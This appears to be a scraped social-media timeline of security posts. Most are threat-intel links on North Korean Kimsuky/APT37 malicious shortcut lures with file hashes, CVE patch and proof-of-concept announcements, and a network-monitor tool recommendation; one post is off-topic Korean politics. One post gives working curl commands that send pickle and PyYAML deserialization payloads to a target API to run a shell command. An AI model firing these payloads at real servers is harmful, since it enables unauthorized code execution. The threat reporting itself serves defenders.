#NorthKorea #APT37 #NarwhalRAT Analysis of APT37 NarwhalRAT Leveraging MS-Themed Phishing and Dead-drop C2 genians.co.kr/en/blog/threat…

Ordinary citizens criticized the election commission for its poor management and demanded reform. The government is listening to them, so now only the election fraud conspiracy theorists remain. Some far‑right Protestants hold worship services at the protest site. That's why more than 70% of Koreans without religion cannot sympathize with them.

Broken official patches for Windows Shell Spoofing Vulnerability (CVE-2026-32202) 0patch.com/blog/micropatches…

We released a demo video for the CVE-2026-45458 Microsoft Outlook and Word Remote Code Execution Vulnerability, patched by Microsoft in Jun 2026. Watch the video and subscribe to our private vulnerability PoC and detailed report service at Patchpoint.io. You can also check it at the following link: youtu.be/AgKhh3bvD8Y #Windows #Microsoft #Word #Outlook #Critical #Vulnerability #CVE_2026_45458

국세청 사칭 김수키(Kimsuky) 에서 만든 악성코드-비밀번호.txt wezard4u.tistory.com/429796 #국세청 #김수키 #Kimsuky

终于找到一个能替代 Wireshark 的开源神器。 GitHub 3.7 万 Star 的 Sniffnet，把网络监控做成了普通人也能看懂的样子。 很多人打开 Wireshark 的第一反应都是： 看不懂，直接关闭。 而 Sniffnet 完全不同。 实时显示上传下载流量、连接主机、访问域名、IP 地理位置，甚至还能查看正在偷偷联网的软件。支持流量过滤、PCAP 导入导出、多网卡监控。 最关键的是界面非常舒服。 不用研究抓包规则，不用学习复杂命令，打开就能看到电脑到底在和谁通信。很多用户直接把它当成 GlassWire 的免费替代品。(Windows Central) Windows、macOS、Linux 全平台支持，Rust 编写，占用资源极低。(GitHub) 对于经常折腾代理、NAS、Docker、服务器的人来说，这绝对属于装机必备工具。 github.com/GyulyVGC/sniffnet

78ResearchLab is excited to announce its membership in the NVIDIA Inception program!

DPRK Shenanigans "Hangul doc" .lnk hides 313 spaces of padding so the real cmd is invisible. Runs PS-> opens a 🇰🇷 Ministry of Unification decoy while installing a hidden scheduled task. #DPRK #Kimsuky #APT43 e291ee630a58c405f86ca83d9364bfc3dbf13aecff9000cca4f2602158dac845

통일부 내부 관계자 를 노린것으로 추정 되는 김수키(Kimsuky) 악성코드-(대외보안)통일부_중동상황관련_정책간담회_기획안.pdf wezard4u.tistory.com/429794 #김수키 #dprk #Kimsuky

Python RCE Pickle curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}' PyYAML curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'

오산 공군기지를 공격을 한것으로 추측 이 되는 김수키(Kimsuky) 에서 만든 악성코드-Update_251001 ACM Sakesan Kantha.pdf.lnk wezard4u.tistory.com/429787 #오산 #악성코드 #김수키 #Kimsuky

Micropatches released for Windows Netlogon Remote Code Execution Vulnerability (CVE-2026-41089) blog.0patch.com/2026/05/micr…

2603vvip고객현황.lnk 7f9fe5839a2ffaa627685f673ee5d4ba5a30857c24d4cf141ab408c7a18e3f4a *TaskName : Intel(R) Ethernet2 Connection 1209-LG #APT #Suspicious

Windows DNS Client RCE -- CVE-2026-41096 POC -- qdcount=0, a DNS OPT resource record (type 41), and 0xff bytes via example response -- github.com/satchfunky/CVE-20…

Cyber Threat Overview 2025 From cert-FR github.com/blackorbird/APT_R…

‼️🚨 Microsoft has patched a critical Windows DNS Client remote code execution vulnerability that allows an unauthorized attacker to execute code over a network. All it takes is a malicious DNS response. The vulnerability is tracked as CVE-2026-41096 with a CVSS score of 9.8. It is a heap-based buffer overflow in dnsapi.dll, the Windows component that processes DNS answers on every machine. To trigger it, an attacker needs a position where they can influence DNS responses: a rogue DNS server, a poisoned resolver, a compromised router, hostile WiFi, or a man-in-the-middle placement. That puts ordinary Windows DNS activity in the blast radius. Browsers, VPN clients, enterprise apps, update checks, and background services constantly ask DNS where to connect. The vulnerable processing sits in the Windows DNS Client path, not an edge-facing server product. Microsoft assessed exploitation as "less likely," and Rapid7 lists the issue as not publicly disclosed and not known to be exploited at release. On the contrary, a 9.8 unauthenticated network RCE in DNS client handling is exactly the kind of bug defenders should assume will be reverse-engineered quickly. Defenders should: - Deploy the May 2026 cumulative updates and confirm coverage across endpoints and servers - Restrict DNS traffic to trusted resolvers where possible - Monitor Dnscache and svchost.exe for abnormal child processes or unexpected outbound activity - Treat public WiFi and untrusted resolver paths as higher-risk until patching is complete

Urgent: Public PoC for Apache HTTP Server. A critical double-free enables unauthenticated DoS and RCE. Update to Apache 2.4.67 immediately. #Apache #CyberSecurity #InfoSec #RCE #VulnerabilityAlert #CVE #WebSecurity #PoC #SysAdmin securityonline.info/apache-h…

another day, another universal linux LPE

260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk 4453b9e985f452365995c399f5292c92764570f03e6a066d7845320dd4ad09a1 #APT

We're likely 1st to publicly exploit crypto: af_alg as a new attack surface in kernelCTF. Our members @n0psledbyte & @st424204 started poking it in Sep 2025, finding a 0-day container escape unnoticed since 2011. @AnthropicAI @OpenAI: interested in collaborations? We are all ears